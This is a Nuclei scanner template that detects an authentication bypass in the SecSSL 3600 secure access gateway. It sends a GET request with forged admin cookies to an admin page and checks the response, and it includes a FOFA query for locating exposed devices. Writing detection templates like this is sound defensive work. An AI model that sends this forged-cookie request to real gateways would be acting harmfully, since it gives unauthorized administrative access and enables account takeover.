id: secsslvpn-auth-bypass

info:
  name: Secure Access Gateway SecSSLVPN - Authentication Bypass
  author: SleepingBag945
  severity: high
  description: |
    The Secure Access Gateway SecSSL 3600 secure access gateway system has an unauthorized access vulnerability. An attacker can obtain the user list and modify the user account password through the vulnerability.
  reference:
    - https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/iot/%E5%A5%87%E5%AE%89%E4%BF%A1/%E7%BD%91%E7%A5%9E%20SecSSL%203600%E5%AE%89%E5%85%A8%E6%8E%A5%E5%85%A5%E7%BD%91%E5%85%B3%E7%B3%BB%E7%BB%9F%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E.md
  metadata:
    verified: true
    max-request: 1
    fofa-query: app="安全接入网关SecSSLVPN"
  tags: secsslvpn,auth-bypass

http:
  - method: GET
    path:
      - "{{BaseURL}}/admin/group/x_group.php?id=1"

    headers:
      Cookie: admin_id=1; gw_admin_ticket=1;

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "group_action.php"
          - "anonymous"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100c67640436f725deaf4e9f4f97fa738b8f306d42c14e9a45fa34f3acfd33f72cb022100f195f8dfbf0ab067af2d4a69ce9a43d289ad33210afd2bf4d35a2a3cae527897:922c64590222798bb761d5b6d8e72950